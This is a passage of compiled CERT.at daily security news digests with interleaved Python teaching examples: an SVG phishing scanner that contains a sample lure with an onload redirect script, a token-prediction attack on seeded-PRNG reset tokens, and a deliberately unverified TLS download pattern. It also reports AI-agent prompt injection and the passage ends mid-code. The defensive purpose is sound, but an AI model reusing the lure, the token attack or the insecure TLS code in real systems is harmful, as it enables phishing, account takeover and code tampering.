Security updates have been issued by AlmaLinux (avahi, cups, firefox, gnutls, golang, httpd, kernel, libtpms, mysql, opentelemetry-collector, php:8.2, podman, postgresql:13, postgresql:15, python3, python3.11, python3.12, python3.9, thunderbird, and udisks2), Debian (firefox-esr, gimp, nncp, node-tar-fs, and squid), Fedora (chromium, firebird, python-azure-keyvault-securitydomain, python-azure-mgmt-security, and python-microsoft-security-utilities-secret-masker), Red Hat (httpd:2.4, kernel, kernel-rt, and mod_http2), SUSE (aide, apache2-mod_security2, chromedriver, cloud-init, docker, gdk-pixbuf, git, google-osconfig-agent, govulncheck-vulndb, gstreamer-plugins-base, iperf, kernel, krb5, krita, luajit, net-tools, nvidia-open-driver-G06-signed, pam, postgresql17, python311, rust-keylime, sevctl, tor, tree-sitter-ruby, and udisks2), and Ubuntu (curl, ghostscript, inetutils, python2.7, and qtbase-opensource-src).
---------------------------------------------
https://lwn.net/Articles/1040058/
∗∗∗ REDCap: Multiple Cross-Site Scripting (XSS) Vulnerabilities ∗∗∗
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/redcap-mult…
∗∗∗ DataSpider Servista improper restriction of XML external entity references ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN23423519/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 25-09-2025 18:00 − Freitag 26-09-2025 18:00
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ Severe vulnerabilities in Cisco Adaptive Security Appliance - actively exploited - updates available ∗∗∗
---------------------------------------------
Cisco has published information about an attack campaign that has presumably been running for several months. In this campaign, attackers who were already attributed a broad campaign against edge devices last year compromised Cisco Adaptive Security Appliance (ASA) 5500-X series systems with VPN web services enabled, in order to plant malware on the taken-over devices and steal data.
---------------------------------------------
https://www.cert.at/de/warnungen/2025/9/schwerwiegende-sicherheitslucken-in…
∗∗∗ Unofficial Postmark MCP npm silently stole users' emails ∗∗∗
---------------------------------------------
An npm package copying the official postmark-mcp project on GitHub turned bad with the latest update, which added a single line of code to exfiltrate all its users' email communication.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/unofficial-postmark-mcp-npm-…
∗∗∗ Salesforce AI Agents Forced to Leak Sensitive Data ∗∗∗
---------------------------------------------
Yet again researchers have uncovered an opportunity (dubbed "ForcedLeak") for indirect prompt injection against autonomous agents lacking sufficient security controls — but this time the risk involves PII, corporate secrets, physical location data, and so much more.
---------------------------------------------
https://www.darkreading.com/vulnerabilities-threats/salesforce-ai-agents-le…
∗∗∗ HeartCrypt’s wholesale impersonation effort ∗∗∗
---------------------------------------------
How the notorious Packer-as-a-Service operation built itself into a hydra.
---------------------------------------------
https://news.sophos.com/en-us/2025/09/26/heartcrypts-wholesale-impersonatio…
∗∗∗ New COLDRIVER Malware Campaign Joins BO Team and Bearlyfy in Russia-Focused Cyberattacks ∗∗∗
---------------------------------------------
The Russian advanced persistent threat (APT) group known as COLDRIVER has been attributed to a fresh round of ClickFix-style attacks designed to deliver two new "lightweight" malware families tracked as BAITSWITCH and SIMPLEFIX.
---------------------------------------------
https://thehackernews.com/2025/09/new-coldriver-malware-campaign-joins-bo.h…
∗∗∗ North Korea's Lazarus Group shares its malware with IT work scammers ∗∗∗
---------------------------------------------
North Korean-linked crews connected to the pervasive IT worker scams have upped their malware game, using more advanced tools, including a backdoor that has much of the same code as Pyongyang's infamous Lazarus Group deploys.
---------------------------------------------
https://theregister.com/2025/09/25/lazarus_group_shares_malware_with_it_sca…
∗∗∗ LockBit's new variant is most dangerous yet, hitting Windows, Linux and VMware ESXi ∗∗∗
---------------------------------------------
Trend Micro has sounded the alarm over the new LockBit 5.0 ransomware strain, which it warns is "significantly more dangerous" than past versions due to its newfound ability to simultaneously target Windows, Linux, and VMware ESXi environments.
---------------------------------------------
https://theregister.com/2025/09/26/lockbits_new_variant_is_most/
∗∗∗ Vietnamese Hackers Use Fake Copyright Notices to Spread Lone None Stealer ∗∗∗
---------------------------------------------
New Lone None Stealer uses Telegram C2 and DLL side-loading to grab passwords, credit cards, and crypto. Find out how to spot this highly evasive phishing scam.
---------------------------------------------
https://hackread.com/vietnamese-hackers-fake-copyright-notice-lone-none-ste…
∗∗∗ It Is Bad (Exploitation of Fortra GoAnywhere MFT CVE-2025-10035) - Part 2 ∗∗∗
---------------------------------------------
We’re back, just over 24 hours later, to share our evolving understanding of CVE-2025-10035.
---------------------------------------------
https://labs.watchtowr.com/it-is-bad-exploitation-of-fortra-goanywhere-mft-…
∗∗∗ SVG Phishing hits Ukraine with Amatera Stealer, PureMiner ∗∗∗
---------------------------------------------
Phishing emails disguised as official notices from Ukraine’s police deliver Amatera Stealer and PureMiner in a fileless attack chain.
---------------------------------------------
https://www.fortinet.com/blog/threat-research/svg-phishing-hits-ukraine-wit…
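Both the Microsoft item on LLM-crafted SVG phishing (in the report above) and the Fortinet item here rely on the same property: an SVG is XML that a browser will execute script from and navigate on. The following is an added example, not code from Microsoft Threat Intelligence or Fortinet: a small static scanner that a mail gateway or an analyst could run over an SVG attachment to flag the constructs that make it active (script elements, on* event handlers, javascript:/data: URIs, foreignObject embedding) while ignoring plain drawing markup. Both sample SVGs are constructed for the example and the encoded redirect target is a placeholder.

```python
"""Static check for active content in SVG mail attachments.

Added example, not code from Microsoft or Fortinet. The sample SVGs
are constructed; the base64 string decodes to a placeholder URL.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
DANGEROUS_URI = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Drop the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def svg_findings(svg_text: str) -> list[str]:
    """Return human-readable reasons the SVG is suspicious; [] if none."""
    findings: list[str] = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if EVENT_ATTR.match(name):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and DANGEROUS_URI.match(value):
                scheme = value.split(":", 1)[0].strip().lower()
                findings.append(f"{scheme}: URI in href on <{tag}>")
    return findings


def is_suspicious(svg_text: str) -> bool:
    return bool(svg_findings(svg_text))


# Constructed samples: a plain icon and a "business dashboard" lure that
# hides a redirect behind an onload handler and an inline script.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="#1f77b4"/>
</svg>"""

PHISH_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()" width="600" height="400">
  <title>Quarterly Revenue Summary</title>
  <text x="10" y="20">Business performance dashboard, FY2025</text>
  <a xlink:href="javascript:void(0)"><rect width="600" height="400" fill="white"/></a>
  <script type="text/javascript">
    var revenueTargets = ["Q1", "Q2", "Q3"];
    function init() { location.replace(atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv")); }
  </script>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("phish", PHISH_SVG)):
        print(label, svg_findings(doc))
```

Two notes for real deployments: parse untrusted XML with defusedxml rather than the standard ElementTree, and treat this as a filter rather than a classifier, since the lure text itself (the "business terminology" Microsoft describes) is deliberately unremarkable; the script and event-handler constructs are what give the file away.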
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, kernel, and thunderbird), Debian (ceph and thunderbird), Fedora (chromium, mingw-expat, python-deepdiff, python-orderly-set, python-pip, rust-az-cvm-vtpm, rust-az-snp-vtpm, rust-az-tdx-vtpm, and trustee-guest-components), Oracle (aide, kernel, and thunderbird), Red Hat (firefox, kernel, openssh, perl-YAML-LibYAML, and thunderbird), Slackware (expat), SUSE (jasper, libssh, openjpeg2, and python-pycares), and Ubuntu (linux-aws-6.14, linux-hwe-6.14, linux-azure, linux-hwe-6.8, linux-realtime-6.8, node-sha.js, and pcre2).
---------------------------------------------
https://lwn.net/Articles/1039749/
∗∗∗ [R1] Stand-alone Security Patch Available for Tenable Security Center versions 6.5.1 and 6.6.0: SC-202509.1 ∗∗∗
---------------------------------------------
Security Center leverages third-party software to help provide underlying functionality. One of the third-party components (PostgreSQL) was found to contain vulnerabilities, and an updated version has been made available by the provider.
---------------------------------------------
https://www.tenable.com/security/tns-2025-18
∗∗∗ Security Update Dingtian DT-R002 ∗∗∗
---------------------------------------------
All versions of Dingtian DT-R002 are vulnerable to an Insufficiently Protected Credentials vulnerability that could allow an attacker to retrieve the current user's username without authentication.
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-268-01
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 24-09-2025 18:00 − Donnerstag 25-09-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Microsoft will offer free Windows 10 security updates in Europe ∗∗∗
---------------------------------------------
Microsoft will offer free extended security updates for Windows 10 users in the European Economic Area (EEA), which includes Iceland, Liechtenstein, Norway, and all 27 European Union member states.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-will-offer-free-w…
∗∗∗ Malicious Rust packages on Crates.io steal crypto wallet keys ∗∗∗
---------------------------------------------
Two malicious packages with nearly 8,500 downloads in Rust's official crate repository scanned developers' systems to steal cryptocurrency private keys and other secrets.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/malicious-rust-packages-on-c…
∗∗∗ Supermicro: Countless server mainboards vulnerable to firmware backdoors ∗∗∗
---------------------------------------------
Attackers can inject malware into the BMC firmware of numerous Supermicro mainboards and thereby take permanent control.
---------------------------------------------
https://www.golem.de/news/supermicro-unzaehlige-server-mainboards-anfaellig…
∗∗∗ XCSSET evolves again: Analyzing the latest updates to XCSSET’s inventory ∗∗∗
---------------------------------------------
Microsoft Threat Intelligence has uncovered a new variant of the XCSSET malware, which is designed to infect Xcode projects, typically used by software developers building Apple or macOS-related applications.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2025/09/25/xcsset-evolves-aga…
∗∗∗ OnePlus leaves researchers on read over Android bug that exposes texts ∗∗∗
---------------------------------------------
Rapid7 warns the flaw could let any app peek at your SMS, but the smartphone vendor won't pick up. Security researchers report that OnePlus smartphone users remain vulnerable to a critical bug that allows any application to read SMS and ..
---------------------------------------------
https://www.theregister.com/2025/09/23/rapid7_oneplus_android_bug/
∗∗∗ Patch now! Root attacks on Cisco network devices possible ∗∗∗
---------------------------------------------
Network equipment vendor Cisco warns of attacks on, among others, routers and switches. Admins should install the current security updates.
---------------------------------------------
https://www.heise.de/news/Jetzt-patchen-Angreifer-attackieren-Netzwerkgerae…
∗∗∗ Too insecure: IT service provider NTT Data reportedly parting ways with Ivanti products ∗∗∗
---------------------------------------------
Not only the internal network is affected, but also resale to customers. The security of the products is said to be an unacceptable risk.
---------------------------------------------
https://www.heise.de/news/Zu-unsicher-IT-Dienstleister-NTT-Data-trennt-sich…
∗∗∗ Criminals announce bank call via SMS or WhatsApp ∗∗∗
---------------------------------------------
That criminals pose as bank employees on the phone has long been known. What is new is a particularly sophisticated variant currently in circulation: the criminals deliberately build trust by announcing the call in advance via SMS or WhatsApp message.
---------------------------------------------
https://www.watchlist-internet.at/news/kriminelle-kuendigen-bankanruf-per-s…
∗∗∗ International anti-fraud crackdown recovers more than $400 million, Interpol says ∗∗∗
---------------------------------------------
Authorities from more than 40 countries and territories blocked 68,000 bank accounts and froze about 400 cryptocurrency wallets as part of the operation from April through August, Interpol said.
---------------------------------------------
https://therecord.media/anti-fraud-interpol-crackdown-recovers-over-400-mil…
∗∗∗ Securing Microsoft Entra ID: Lessons from the Field – Part 1 ∗∗∗
---------------------------------------------
This multipart blog series is focused on the real-world lessons learned while securing Microsoft Entra ID. Based on hands-on experience across various environments and organizations, we’ll explore the practical, high-impact strategies that work and more importantly, the common misconfigurations, overlooked settings, and pitfalls that can ..
---------------------------------------------
https://blog.nviso.eu/2025/09/25/securing-microsoft-entra-id-lessons-from-t…
∗∗∗ This Is How Your LLM Gets Compromised ∗∗∗
---------------------------------------------
Poisoned data. Malicious LoRAs. Trojan model files. AI attacks are stealthier than ever—often invisible until it’s too late. Here’s how to catch them before they catch you.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/i/prevent-llm-compromise.html
∗∗∗ Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors ∗∗∗
---------------------------------------------
Google Threat Intelligence Group (GTIG) is tracking BRICKSTORM malware activity, which is being used to maintain persistent access to victim organizations in the United States. Since March 2025, Mandiant Consulting has responded to intrusions across a range of industry verticals, most notably legal services, Software as a Service ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espiona…
∗∗∗ 180,000 ICS/OT Devices and Counting: The Unforgivable Exposure ∗∗∗
---------------------------------------------
A new Bitsight TRACE threat research report shows that Industrial Control System and Operational Technology (ICS/OT) exposure is climbing again.
---------------------------------------------
https://www.bitsight.com/blog/the-growing-exposure-of-ics-ot-devices
∗∗∗ Yet Another Random Story: VBScripts Randomize Internals ∗∗∗
---------------------------------------------
In one of our recent posts, Dennis shared an interesting case study of C# exploitation that rode on Random-based password-reset tokens. He demonstrated how to use the single-packet attack, or a bit of old-school math, to beat the game. Recently, I performed a security test on a target which had a dependency written in VBScript. This blog post focuses ..
---------------------------------------------
https://blog.doyensec.com/2025/09/25/yet-another-random-story.html
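The Doyensec post above builds on a prior case where password-reset tokens came from a seeded, non-cryptographic Random. The following is an added example and not Doyensec's code, nor the C# or VBScript internals from their posts: it models the bug class in Python. The hypothetical WeakTokenIssuer seeds random.Random with the current unix second (the seed source is an assumption for the illustration), so anyone who knows roughly when a reset was requested can enumerate candidate seeds and reproduce the token; the "single-packet" variant is the special case where the attacker's own request and the victim's are processed with the same seed. SafeTokenIssuer shows the fix. The clock is injected so the scenario runs deterministically offline.

```python
"""Recovering a reset token generated from a seeded, non-cryptographic PRNG.

Added example, not Doyensec's code. WeakTokenIssuer, FakeClock and the
timestamp seed are assumptions made for the illustration.
"""
from __future__ import annotations

import random
import secrets
import string

ALPHABET = string.ascii_letters + string.digits
TOKEN_LEN = 32


def token_for_seed(seed: int) -> str:
    """Deterministic: the same seed always yields the same token."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(TOKEN_LEN))


class FakeClock:
    """Constructed clock so the example does not depend on wall time."""
    def __init__(self, now: int) -> None:
        self.now = now

    def __call__(self) -> int:
        return self.now


class WeakTokenIssuer:
    """Hypothetical vulnerable issuer: the only entropy is the timestamp."""
    def __init__(self, clock) -> None:
        self.clock = clock

    def issue(self) -> str:
        return token_for_seed(self.clock())


class SafeTokenIssuer:
    """The fix: draw from the OS CSPRNG; there is no seed to recover."""
    def issue(self) -> str:
        return secrets.token_urlsafe(32)


def recover_seed(observed: str, approx_time: int, window: int = 300) -> int | None:
    """Attacker step 1: brute-force the seed behind a token you legitimately
    received (a reset for your own account), knowing it was issued within
    +/- window seconds of approx_time."""
    for seed in range(approx_time - window, approx_time + window + 1):
        if token_for_seed(seed) == observed:
            return seed
    return None


def candidate_tokens(center_seed: int, spread: int) -> set[str]:
    """Attacker step 2: every token the victim could have received if their
    reset was issued within +/- spread seconds of the recovered seed."""
    return {token_for_seed(s) for s in range(center_seed - spread, center_seed + spread + 1)}


def demo() -> bool:
    """End-to-end: attacker requests a reset, recovers the seed, then
    predicts the victim's token issued two seconds later."""
    clock = FakeClock(1_700_000_000)
    issuer = WeakTokenIssuer(clock)
    my_token = issuer.issue()
    clock.now += 2
    victim_token = issuer.issue()
    seed = recover_seed(my_token, approx_time=1_700_000_100)
    return seed is not None and victim_token in candidate_tokens(seed, spread=5)


if __name__ == "__main__":
    print("victim token predicted:", demo())
```

The candidate set for a few seconds of uncertainty is tiny, which is why rate limiting on the reset endpoint does not rescue a design like this; only an unpredictable token source does.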
=====================
= Vulnerabilities =
=====================
∗∗∗ Numerous vulnerabilities in iMonitorSoft EAM ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste…
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 23-09-2025 18:00 − Mittwoch 24-09-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Supermicro server motherboards can be infected with unremovable malware ∗∗∗
---------------------------------------------
One of the two vulnerabilities is the result of an incomplete patch Supermicro released in January, said Alex Matrosov, founder and CEO of Binarly, the security firm that discovered it. [..] The two new vulnerabilities—tracked as CVE-2025-7937 and CVE-2025-6198—reside inside silicon soldered onto Supermicro motherboards that run servers inside data centers. [..] Supermicro said it has updated the BMC firmware to mitigate the vulnerabilities. The company is currently testing and validating affected products.
---------------------------------------------
https://arstechnica.com/security/2025/09/supermicro-server-motherboards-can…
∗∗∗ PyPI urges users to reset credentials after new phishing attacks ∗∗∗
---------------------------------------------
The Python Software Foundation has warned victims of a new wave of phishing attacks using a fake Python Package Index (PyPI) website to reset credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/pypi-urges-users-to-reset-cr…
∗∗∗ YiBackdoor: A New Malware Family With Links to IcedID and Latrodectus ∗∗∗
---------------------------------------------
Zscaler ThreatLabz has identified a new malware family that we named YiBackdoor, which was first observed in June 2025. The malware is particularly interesting because it contains significant code overlaps with IcedID and Latrodectus. Similar to Zloader and Qakbot, IcedID was originally designed for facilitating banking and wire fraud.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/yibackdoor-new-malware-fami…
∗∗∗ Fake Malwarebytes, LastPass, and others on GitHub serve malware ∗∗∗
---------------------------------------------
Fake software—including Malwarebytes and LastPass—is currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-a…
∗∗∗ Scam website with fake investment project in the style of orf.at ∗∗∗
---------------------------------------------
Plus a fake video of Federal President Van der Bellen. The perpetrators want to harvest personal data and pocket 250 euros.
---------------------------------------------
https://www.derstandard.at/story/3000000289130/betrugs-website-mit-fake-inv…
∗∗∗ Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors ∗∗∗
---------------------------------------------
Google Threat Intelligence Group (GTIG) is tracking BRICKSTORM malware activity, which is being used to maintain persistent access to victim organizations in the United States. [..] The value of these targets extends beyond typical espionage missions, potentially providing data to feed development of zero-days and establishing pivot points for broader access to downstream victims.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espiona…
∗∗∗ Is This Bad? This Feels Bad. (Fortra GoAnywhere CVE-2025-10035) ∗∗∗
---------------------------------------------
On Thursday, September 18, Fortra published a security advisory fi-2025-012 titled: Deserialization Vulnerability in GoAnywhere MFT's License Servlet. The title in itself is reason for alarm, with the description going further to explain how we likely got to a CVSS 10.0 [..] No mystery is complete without a few unanswered questions. Despite our usual routine of reverse engineering and creative detours, we’ve ended this one with more questions than usual.
---------------------------------------------
https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-1…
∗∗∗ Mobile network servers with 100,000 SIM cards seized in New York ∗∗∗
---------------------------------------------
In the vicinity of the UN headquarters in New York, 300 SIM card servers and 100,000 SIM cards were discovered. Their purpose is unclear.
---------------------------------------------
https://heise.de/-10668021
∗∗∗ Cyberattack on airports: continuing problems at BER and an arrest ∗∗∗
---------------------------------------------
Days after the cyberattack, disruptions at BER airport persist. Meanwhile, a suspect has been arrested in the United Kingdom.
---------------------------------------------
https://heise.de/-10669658
∗∗∗ How MCP Authentication Flaws Enable RCE in Claude Code, Gemini CLI, and More ∗∗∗
---------------------------------------------
During our security testing, we discovered that connecting to a malicious MCP server via common coding tools like Claude Code and Gemini CLI could give attackers instant control over user computers.
---------------------------------------------
https://verialabs.com/blog/from-mcp-to-shell/
=====================
= Vulnerabilities =
=====================
∗∗∗ Unpatched flaw in OnePlus phones lets rogue apps read text messages ∗∗∗
---------------------------------------------
A vulnerability in multiple OnePlus OxygenOS versions allows any installed app to access SMS data and metadata without requiring permission or user interaction. [..] The flaw, tracked as CVE-2025-10184, and discovered by Rapid7 researchers, is currently unpatched and exploitable.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/unpatched-flaw-in-oneplus-ph…
∗∗∗ Two Critical Flaws Uncovered in Wondershare RepairIt Exposing User Data and AI Models ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed two security flaws in Wondershare RepairIt that exposed private user data and potentially exposed the system to artificial intelligence (AI) model tampering and supply chain risks. [..] Successful exploitation of the two flaws can allow an attacker to circumvent authentication protection on the system and launch a supply chain attack, ultimately resulting in the execution of arbitrary code on customers' endpoints. [..] The cybersecurity company said it responsibly disclosed the two issues through its Zero Day Initiative (ZDI) in April 2025, but noted that it has yet to receive a response from the vendor despite repeated attempts. In the absence of a fix, users are recommended to "restrict interaction with the product." CVE-2025-10643, CVE-2025-10644
---------------------------------------------
https://thehackernews.com/2025/09/two-critical-flaws-uncovered-in.html
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel and kernel-rt), Fedora (expat), Red Hat (kernel and multiple packages), SUSE (avahi, busybox, busybox-links, kernel, sevctl, tcpreplay, thunderbird, and tor), and Ubuntu (isc-kea, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-aws-6.8, linux-gcp-6.8, linux-aws-fips, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-realtime, python-pip, and rabbitmq-server).
---------------------------------------------
https://lwn.net/Articles/1039311/
∗∗∗ Libraesva ESG Security advisory: command injection vulnerability (CVE-2025-59689) ∗∗∗
---------------------------------------------
https://docs.libraesva.com/knowledgebase/security-advisory-command-injectio…
∗∗∗ ZDI-25-907: Autodesk Revit RFA File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-25-907/
∗∗∗ Google Chrome: Chrome for Android Update ∗∗∗
---------------------------------------------
http://chromereleases.googleblog.com/2025/09/chrome-for-android-update_23.h…
∗∗∗ Google Chrome: Stable Channel Update for Desktop ∗∗∗
---------------------------------------------
http://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desk…
∗∗∗ AutomationDirect CLICK PLUS ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-01
∗∗∗ Mitsubishi Electric MELSEC-Q Series CPU Module ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-02
∗∗∗ Viessmann Vitogate 300 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-25-266-04
=====================
= End-of-Day report =
=====================
Timeframe: Montag 22-09-2025 18:00 − Dienstag 23-09-2025 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ SonicWall releases SMA100 firmware update to wipe rootkit malware ∗∗∗
---------------------------------------------
SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/sonicwall-releases-sma100-fi…
∗∗∗ GitHub Mandates 2FA and Short-Lived Tokens to Strengthen npm Supply Chain Security ∗∗∗
---------------------------------------------
GitHub on Monday announced that it will be changing its authentication and publishing options "in the near future" in response to a recent wave of supply chain attacks targeting the npm ecosystem, including the Shai-Hulud attack. This includes steps to address threats posed by token abuse and self-replicating malware by allowing local publishing with required two-factor authentication (2FA), granular tokens that will have a limited lifetime of seven days, and trusted publishing, which enables the ability to securely publish npm packages directly from CI/CD workflows using OpenID Connect (OIDC).
---------------------------------------------
https://thehackernews.com/2025/09/github-mandates-2fa-and-short-lived.html
∗∗∗ Four years of back and forth between a security researcher and Vasion Print ∗∗∗
---------------------------------------------
Vasion Print was, or possibly still is, vulnerable. Whether all vulnerabilities have been closed is not apparent at first glance.
---------------------------------------------
https://www.heise.de/news/Vier-Jahre-langes-Hin-und-Her-zwischen-Sicherheit…
∗∗∗ [Guest Diary] Distracting the Analyst for Fun and Profit, (Tue, Sep 23rd) ∗∗∗
---------------------------------------------
Distributed denial of service (DDoS) attacks are a type of cyber-attack where the threat actor attempts to disrupt a service by flooding the target with a ton of requests to overload system resources and prevent legitimate traffic from reaching it. [..] We can draw a few conclusions from analyzing each wave of this attack.
---------------------------------------------
https://isc.sans.edu/diary/rss/32308
∗∗∗ Technical Analysis of Zloader Updates ∗∗∗
---------------------------------------------
Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a Zeus-based modular trojan that emerged in 2015. Zloader was originally designed to facilitate banking fraud, but has since been repurposed for initial access, providing an entry point into corporate environments for the deployment of ransomware.
---------------------------------------------
https://www.zscaler.com/blogs/security-research/technical-analysis-zloader-…
∗∗∗ CISA Shares Lessons Learned from an Incident Response Engagement ∗∗∗
---------------------------------------------
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location.
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a
=====================
= Vulnerabilities =
=====================
∗∗∗ SolarWinds releases third patch to fix Web Help Desk RCE bug ∗∗∗
---------------------------------------------
SolarWinds has released a hotfix for a critical vulnerability in Web Help Desk that allows remote code execution (RCE) without authentication. Tracked as CVE-2025-26399, the security issue is the company's third attempt to address an older flaw identified as CVE-2024-28986 that impacted Web Help Desk (WHD) 12.8.3 and all previous versions.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/solarwinds-releases-third-pa…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (corosync and kernel), Fedora (checkpointctl, chromium, curl, and perl-Catalyst-Authentication-Credential-HTTP), SUSE (firefox, frr, kernel, rustup, vim, and wireshark), and Ubuntu (glibc and pam).
---------------------------------------------
https://lwn.net/Articles/1039124/
∗∗∗ Missing certificate validation leads to RCE in CleverControl employee monitoring software ∗∗∗
---------------------------------------------
Missing validation of the TLS server certificate in the installer of the "CleverControl" employee monitoring software allows attackers who can position themselves on the network path between client and server to execute arbitrary code with administrator privileges. CVE-2025-10548
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/fehlende-validierung-…
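The advisory above describes a bug class rather than a single mistake: a privileged installer that downloads and runs a component over TLS without checking who it is talking to. The following is an added example and not CleverControl's code: it shows, in Python, the unverified TLS context that produces this class of bug beside the hardened form, which keeps chain and hostname validation on and additionally checks the downloaded artifact against a digest shipped with the installer. A constructed stand-in for urlopen plays the on-path attacker so the three outcomes can be exercised offline; the URL, payloads and digest are placeholders.

```python
"""An installer's update fetch: unverified TLS beside the hardened form.

Added example, not CleverControl's code. The on-path attacker, URL,
payloads and digest are constructed for the illustration.
"""
from __future__ import annotations

import hashlib
import hmac
import ssl
import urllib.request

URL = "https://updates.example.invalid/setup.exe"


def make_context_insecure() -> ssl.SSLContext:
    """The anti-pattern: any certificate from any host is accepted."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False            # must be cleared before CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def make_context_hardened(cafile: str | None = None) -> ssl.SSLContext:
    """Chain and hostname validation stay on (the defaults); TLS 1.2 minimum.
    cafile lets the installer pin its own CA instead of the system store."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def artifact_matches(payload: bytes, expected_sha256: str) -> bool:
    """Second line of defence: integrity of the artifact itself."""
    digest = hashlib.sha256(payload).hexdigest()
    return hmac.compare_digest(digest, expected_sha256.lower())


def fetch_update(url: str, expected_sha256: str | None, context: ssl.SSLContext,
                 opener=urllib.request.urlopen) -> bytes:
    """Download and verify. expected_sha256=None models an installer that
    ships no digest at all; the hardened form always passes one."""
    with opener(url, context=context, timeout=30) as resp:
        payload = resp.read()
    if expected_sha256 is not None and not artifact_matches(payload, expected_sha256):
        raise ValueError("artifact digest mismatch; refusing to run installer payload")
    return payload


# --- constructed simulation of an on-path attacker ---------------------------
GENUINE = b"MZ...genuine installer payload..."
GENUINE_SHA256 = hashlib.sha256(GENUINE).hexdigest()
TAMPERED = b"MZ...attacker payload..."


class _FakeResponse:
    def __init__(self, body: bytes) -> None:
        self.body = body

    def read(self) -> bytes:
        return self.body

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False


def on_path_attacker(url, context=None, timeout=None):
    """Stands in for urlopen. The attacker presents a certificate no CA
    issued: a validating client aborts the handshake, a CERT_NONE client
    happily completes it and receives the attacker's payload."""
    if context is None or context.verify_mode != ssl.CERT_NONE:
        raise ssl.SSLCertVerificationError("certificate verify failed: self-signed certificate")
    return _FakeResponse(TAMPERED)


def attack_outcome(context: ssl.SSLContext, expected_sha256: str | None) -> str:
    """'blocked_by_tls', 'blocked_by_digest' or 'compromised'."""
    try:
        payload = fetch_update(URL, expected_sha256, context, opener=on_path_attacker)
    except ssl.SSLCertVerificationError:
        return "blocked_by_tls"
    except ValueError:
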